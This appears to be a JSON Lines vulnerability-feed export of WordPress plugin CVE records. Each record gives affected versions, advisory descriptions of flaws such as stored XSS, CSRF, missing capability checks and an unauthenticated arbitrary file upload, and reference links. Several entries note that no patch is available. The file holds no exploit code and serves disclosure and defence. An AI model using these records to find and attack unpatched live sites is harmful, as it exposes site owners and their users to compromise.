{"CVE_ID":"CVE-2024-11292","slug":"wp-private-content-plus","versionImpact":"3.6.1","description":"The WP Private Content Plus plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c46b91-e371-480f-943a-3906d8b6bbba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c46b91-e371-480f-943a-3906d8b6bbba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0511","slug":"usc-e-shop","versionImpact":"2.11.9","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018name\u2019 parameter in all versions up to, and including, 2.11.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/usc-e-shop\\\/trunk\\\/functions\\\/settlement_func.php#L612\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/usc-e-shop\\\/trunk\\\/functions\\\/settlement_func.php#L612\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235131\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235131\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/usc-e-shop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/usc-e-shop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c26270b-a0a7-4877-aa66-bffe260003df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c26270b-a0a7-4877-aa66-bffe260003df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2005","slug":"front-end-only-users","versionImpact":"3.2.32","description":"The Front End Users plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the file uploads field of the registration form in all versions up to, and including, 3.2.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/plugin\\\/front-end-only-users\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/plugin\\\/front-end-only-users\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/102223a1-07f5-485b-a6af-49cf316d9797?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/102223a1-07f5-485b-a6af-49cf316d9797?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10677","slug":"bluetrait-event-viewer","versionImpact":"2.0.2","description":"The BTEV WordPress plugin through 2.0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1bd4216-798a-4e45-a0ba-3699f0af3c7a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1bd4216-798a-4e45-a0ba-3699f0af3c7a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5928","slug":"wp-sliding-logindashboard-panel","versionImpact":"2.1.1","description":"The WP Sliding Login\/Dashboard Panel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the wp_sliding_panel_user_options() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sliding-logindashboard-panel\\\/trunk\\\/wp-sliding-login-dashboard-panel.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sliding-logindashboard-panel\\\/trunk\\\/wp-sliding-login-dashboard-panel.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7c679e-392c-40cd-b768-d78fae6065bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7c679e-392c-40cd-b768-d78fae6065bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5845","slug":"affiliate-reviews","versionImpact":"1.0.6","description":"The Affiliate Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018numColumns\u2019 parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-reviews\\\/trunk\\\/templates\\\/blocks\\\/block-reviews-grid-style.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-reviews\\\/trunk\\\/templates\\\/blocks\\\/block-reviews-grid-style.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-reviews\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-reviews\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd11b05-feb0-4e32-b11d-9c8f10ddf30a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd11b05-feb0-4e32-b11d-9c8f10ddf30a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8091","slug":"eventon-lite","description":"The EventON Lite plugin for WordPress is vulnerable to Information Exposure in all versions less than, or equal to, 2.4.6 via the add_single_eventon and add_eventon shortcodes due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar_generator.php#L954\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar_generator.php#L954\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-event.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-event.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventon-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventon-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/421fcee2-a05d-4486-837e-ddee3d73d737?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/421fcee2-a05d-4486-837e-ddee3d73d737?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1023","slug":"wp-meta-seo","versionImpact":"4.5.3.","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the saveSitemapSettings function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to change sitemap-related settings of the plugin. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d1e498a-ddcb-4c67-bf0d-bb45b6fe0e9d\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d1e498a-ddcb-4c67-bf0d-bb45b6fe0e9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2174","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_badgeos_log_entries function in versions up to, and including, 3.7.1.6. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete the plugin's log entries.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64e0adbc-c524-4f9d-9741-ce69edf888f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64e0adbc-c524-4f9d-9741-ce69edf888f7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ajax-functions.php#L999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ajax-functions.php#L999\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4728","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4. This makes it possible for authenticated attackers with subscriber-level access and above to change the LadiPage key (a key fully controlled by the attacker), enabling them to freely create new pages, including web pages that trigger stored XSS","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dafc81c-f1be-422d-b34f-87f1956e8849?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dafc81c-f1be-422d-b34f-87f1956e8849?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34423","slug":"forty-four","versionImpact":"1.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in phpbits Forty Four \u2013 404 Plugin for WordPress allows Stored XSS.This issue affects Forty Four \u2013 404 Plugin for WordPress: from n\/a through 1.4.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forty-four\\\/wordpress-forty-four-404-plugin-for-wordpress-plugin-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forty-four\\\/wordpress-forty-four-404-plugin-for-wordpress-plugin-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5073","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.21","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Twitter Feed component in all versions up to, and including, 5.9.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8db80ef-5863-41dd-b33f-850984a72ee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8db80ef-5863-41dd-b33f-850984a72ee6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Traits\\\/Twitter_Feed.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Traits\\\/Twitter_Feed.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090746\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090746\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3993","slug":"azan","versionImpact":"0.6","description":"The AZAN Plugin WordPress plugin through 0.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cd60dd-8599-4af3-99db-c42de504606c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cd60dd-8599-4af3-99db-c42de504606c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5648","slug":"wisdm-reports-for-learndash","versionImpact":"1.8.2","description":"The LearnDash LMS \u2013 Reports plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.8.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update various plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbbd0d7-882f-4bc8-a67a-4d6dc05cb796?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbbd0d7-882f-4bc8-a67a-4d6dc05cb796?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L455\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wisdm-reports-for-learndash\\\/trunk\\\/includes\\\/admin\\\/class-admin-functions.php#L455\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7895","slug":"beaver-builder-lite-version","versionImpact":"2.8.3.5","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018type\u2019 parameter in all versions up to, and including, 2.8.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/button-group.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/button-group.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/includes\\\/frontend.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/trunk\\\/modules\\\/button-group\\\/includes\\\/frontend.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beaver-builder-lite-version\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143080%40beaver-builder-lite-version&new=3143080%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143080%40beaver-builder-lite-version&new=3143080%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10232","slug":"atomchat","versionImpact":"1.1.5","description":"The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atomchat shortcode in all versions up to, and including, 1.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c10993bd-b4f3-44b6-bb0f-cb783dbcf314?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c10993bd-b4f3-44b6-bb0f-cb783dbcf314?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/atomchat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/atomchat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178522\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178522\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13637","slug":"demo-awesome","versionImpact":"1.0.3","description":"The Demo Awesome plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin function in all versions up to, and including, 1.0.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/class-demo-awesome-admin.php#L407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/class-demo-awesome-admin.php#L407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/js\\\/admin.js#L1684\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-awesome\\\/trunk\\\/inc\\\/admin\\\/js\\\/admin.js#L1684\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-awesome\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-awesome\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a552f81-b222-46f0-b318-702e09d249c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a552f81-b222-46f0-b318-702e09d249c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5926","slug":"link-shield","versionImpact":"0.5.4","description":"The Link Shield plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.5.4. This is due to missing or incorrect nonce validation on the link_shield_menu_options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/link-shield\\\/trunk\\\/link-shield.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/link-shield\\\/trunk\\\/link-shield.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e577828-4368-4781-877b-badb4dc50763?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e577828-4368-4781-877b-badb4dc50763?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5843","slug":"brandfolder","versionImpact":"5.0.19","description":"The Brandfolder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 5.0.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brandfolder\\\/tags\\\/5.0.19\\\/brandfolder-integration.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brandfolder\\\/tags\\\/5.0.19\\\/brandfolder-integration.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brandfolder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brandfolder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedbe508-e879-4989-89a6-db909ecd35a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedbe508-e879-4989-89a6-db909ecd35a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8080","slug":"alobaidi-captcha","versionImpact":"1.0.3","description":"The Alobaidi Captcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alobaidi-captcha\\\/trunk\\\/login-form.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f6048b-7de6-4ec9-af89-cd08c43d0aaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f6048b-7de6-4ec9-af89-cd08c43d0aaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
